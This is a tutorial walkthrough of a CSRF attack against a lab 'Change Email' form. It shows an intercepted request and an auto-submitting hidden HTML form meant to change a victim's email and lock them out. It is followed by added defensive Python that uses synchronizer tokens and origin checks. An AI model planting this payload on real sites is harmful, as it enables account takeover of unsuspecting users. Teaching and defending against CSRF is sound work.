An Introduction to CSRF Attacks



We have a web application that’s vulnerable to CSRF attacks. What we want to do is create a malicious HTML snippet: a page that, if accessed by an arbitrary user, auto-submits a request on their behalf using their own credentials (cookies).

More specifically, the goal is to change a user’s email, and lock them out of the site.


We want to target the “Change Email” form, so let’s do some recon first by logging into our account to check things out.

After logging in, we can see the “Change Email” page on The specific form looks like this:

HTTP/1.1 200 OK
Content-Length: 3069

<!DOCTYPE html>
    <form class="login-form" action="/email/change-email" method="POST">
        <input required type="email" name="email" value="">
        <button class='button' type='submit'> Update email </button>
    </form>

Let’s submit this form with our account, then intercept it to see what’s inside:

POST /email/change-email HTTP/1.1
Host:
Cookie: session=4TPtiDWqNK0xcLA3anvevopNojTU5zTe

We can see that it’s vulnerable to CSRF attacks because:

  1. There is a relevant action: POST /email/change-email
  2. Authentication is cookie-based, so the browser attaches the session cookie automatically
  3. The request parameters are predictable; in this case it’s just email


Now that we have all the pieces, let’s craft the exploit. We want to write a similar form that has hidden inputs, and that auto-submits, like this one:

    <form action="" method="POST">
        <input type="hidden" name="email" value="" />
    </form>
    <script>
        document.forms[0].submit();
    </script>

That’s it! We can verify that it does the job by going to the page ourselves and checking the new email.
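The three conditions listed above are also the checklist for closing the hole. What follows is an added defensive example, not code from the original post: a hypothetical server-side check for POST /email/change-email that rejects the auto-submitting form by requiring a per-session synchronizer token and comparing the Origin and Sec-Fetch-Site headers against the site's own origin. SITE_ORIGIN, the handler signature and the sample requests are constructed placeholders.

```python
# Added defensive example (not code from the original post): a hypothetical
# server-side check applied before POST /email/change-email is honoured.
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://example.test"  # constructed placeholder for the app's origin


def issue_csrf_token(session: dict) -> str:
    """Synchronizer token: generated once per session and embedded as a hidden
    input in the Change Email form; a page on another site cannot read it."""
    session.setdefault("csrf_token", secrets.token_urlsafe(32))
    return session["csrf_token"]


def change_email_allowed(session: dict, headers: dict, form: dict) -> tuple:
    """Return (allowed, reason). Each check targets one of the three
    properties the post relies on: cookie-only auth, a predictable body,
    and a submission originating from another site."""
    # 1. Origin (or Referer as a fallback) must match our own origin when sent.
    src = headers.get("Origin") or headers.get("Referer")
    if src is not None:
        parts = urlsplit(src)
        if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
            return False, "cross-site origin"
    # 2. Fetch metadata: browsers that send it label a form submitted from
    #    another site as "cross-site".
    if headers.get("Sec-Fetch-Site") == "cross-site":
        return False, "cross-site per Sec-Fetch-Site"
    # 3. The body must carry the session's token; compare in constant time.
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid csrf token"
    return True, "ok"


def demo() -> dict:
    session = {}
    token = issue_csrf_token(session)
    # Constructed request from the site's own form (token present).
    legit = change_email_allowed(
        session,
        {"Origin": SITE_ORIGIN, "Sec-Fetch-Site": "same-origin"},
        {"email": "me@example.test", "csrf_token": token},
    )
    # Constructed request from an auto-submitting form on another site:
    # the browser attaches the session cookie but cannot supply the token.
    forged = change_email_allowed(
        session,
        {"Origin": "https://attacker.test", "Sec-Fetch-Site": "cross-site"},
        {"email": "attacker@example.test"},
    )
    return {"legit": legit, "forged": forged}
```

Setting the session cookie with SameSite=Lax or Strict adds a second, independent layer, since the browser then withholds the cookie from cross-site POSTs altogether.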